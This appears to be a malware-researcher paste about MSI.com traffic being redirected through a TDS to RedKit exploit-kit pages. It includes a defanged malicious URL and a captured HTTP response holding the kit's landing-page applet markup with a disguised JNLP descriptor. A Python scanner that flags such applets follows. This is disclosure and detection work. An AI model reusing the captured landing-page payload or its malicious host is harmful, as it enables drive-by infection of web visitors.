- // *MSI.COM site got redirected by TDS,
- // On one occasion to Blackhole sites
- // Just checked it changed to RedKit Sites,
- // Note PoC of this case:
- http://urlquery.net/report.php?id=3764213
- http://urlquery.net/report.php?id=3763965
- http://urlquery.net/report.php?id=3764205
- // Below RedKit PoC of the redirected URL:
- // h00p://kristians1.net/blog/?p=5613
- GET /blog/?p=5613 HTTP/1.1
- Host: kristians1.net
- User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: keep-alive
- Referer: http://fr.msi.com/
- HTTP/1.1 200 OK
- Date: Mon, 15 Jul 2013 17:56:47 GMT
- Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fcgid/2.3.5
- X-Curl-Errno: 0
- Expires: Mon, 26 Jul 1997 05:00:00 GMT
- Cache-Control: no-cache
- Pragma: no-cache
- Content-Length: 173
- Connection: close
- Content-Type: text/html
- <html><body><table>LOLOLO<applet><param name="jnlp_href" value="yde.xmp" /><param name="size" value="ur=ax=hmayzmjxkce0mdehczha&7&.y"></param></applet></table></body></html>
- ---
- #MalwareMustDie!
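
A triage check for the response body captured above, as an added example that is not part of the original paste: it parses applet markup and reports any applet whose parameters include `jnlp_href`, as the captured body does. The reasons it reports are heuristics assumed for this example, and the benign sample is constructed.

```python
from html.parser import HTMLParser

# Response body copied from the capture above.
SAMPLE_BODY = ('<html><body><table>LOLOLO<applet><param name="jnlp_href" value="yde.xmp" />'
               '<param name="size" value="ur=ax=hmayzmjxkce0mdehczha&7&.y"></param>'
               '</applet></table></body></html>')
# Constructed benign sample: a classic applet with no JNLP descriptor.
BENIGN_BODY = '<applet code="Clock.class" archive="clock.jar"><param name="tz" value="UTC"></applet>'

class AppletParamScanner(HTMLParser):
    """Collects <param> name/value pairs found inside each <applet> element."""
    def __init__(self):
        super().__init__()
        self.applets = []   # one dict of params per <applet>
        self._depth = 0     # > 0 while inside an <applet>

    def handle_starttag(self, tag, attrs):
        if tag == "applet":
            self._depth += 1
            self.applets.append({})
        elif tag == "param" and self._depth:
            a = dict(attrs)
            self.applets[-1][(a.get("name") or "").lower()] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "applet" and self._depth:
            self._depth -= 1

def scan(body):
    """Return [(jnlp_href value, [reasons])] for applets that load via JNLP."""
    parser = AppletParamScanner()
    parser.feed(body)
    parser.close()
    hits = []
    for params in parser.applets:
        href = params.get("jnlp_href")
        if href is None:
            continue
        reasons = ["applet launched through jnlp_href"]
        # Assumed heuristic: a descriptor normally carries a .jnlp extension.
        if not href.lower().split("?")[0].endswith(".jnlp"):
            reasons.append("descriptor does not use a .jnlp extension")
        hits.append((href, reasons))
    return hits

if __name__ == "__main__":
    for href, reasons in scan(SAMPLE_BODY):
        print(href, "->", "; ".join(reasons))
```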